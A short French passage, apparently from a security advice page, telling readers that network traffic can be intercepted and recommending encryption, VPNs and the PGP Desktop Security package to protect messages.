Un anti-hacker doit savoir que le seul salut contre l'interception des données est leur cryptage, c'est-à-dire méthodes de protection cryptographique. Lorsque vous envoyez un message sur le réseau, vous devez supposer à l'avance que le système de câble du réseau est absolument vulnérable et que tout pirate informatique connecté au réseau pourra intercepter tous les messages secrets transmis. Il existe deux technologies pour résoudre ce problème : créer un réseau VPN et chiffrer les messages eux-mêmes. Toutes ces tâches sont très simples à résoudre à l'aide du progiciel PGP Desktop Security (sa description se trouve par exemple dans).

Populaire dans la catégorie :